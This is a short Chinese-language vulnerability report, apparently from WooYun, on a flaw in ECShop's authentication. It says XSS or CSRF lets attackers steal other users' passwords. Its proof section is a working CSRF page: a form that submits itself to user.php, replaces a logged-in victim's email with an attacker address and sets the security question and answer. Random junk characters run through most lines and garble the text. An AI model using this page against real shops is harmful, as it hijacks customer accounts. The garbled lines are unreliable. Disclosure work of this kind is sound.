简要描述:8 \& H' ?- V$ M' G( P1 t8 r# m' H
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现5 }+ L1 O2 ^8 n6 p
! |% Q4 V' a9 R: b5 jDemo For:http://www.wooyun.org/bug.php?action=view&id=395! z0 C1 S( O" z, m# j8 [
" k5 ?5 A [, v) }9 w详细说明:7 _* e! p, }4 g D7 Y
利用csrf和xss可以突破官方所说的“障碍”
' J+ h3 [, Z g0 lxss版本已经有人说明
m% |/ b7 \/ w0 S1 Z( I这里给出csrf版本
" ^: Q3 ~; g1 G/ F5 @$ K: L- i/ E) `4 J6 s2 Y
漏洞证明:
$ }( G$ S0 X3 t" _9 ~4 }0 w- ?: m<html>% n- o$ J! u4 g. `
<body>! \$ s/ i/ m( ?* g5 e
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">7 ^ v9 m6 }/ y) y! P- b9 W9 X
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">- \7 i9 R. Q$ v: b/ {
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
& E& e! G. Z+ r0 n* |5 I) s' U<INPUT TYPE="text" NAME="sel_question" value="ecshop">
; f" m0 i; D6 p* p& ^9 a<INPUT TYPE="text" NAME="passwd_answer" value="exploit">( Y6 s9 A5 d, S
</body>
9 I9 `. L2 w2 C' ~. k; w* T<script>
1 y1 R/ Z2 P* z' kdocument.forms[0].submit();
5 T g; E/ P% f; i" M</script>& `5 h2 m9 t3 [5 x8 [
</html>! h3 U% |- a+ }
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失) L: h. ~/ y# ~
m( m" Y% H. f! c |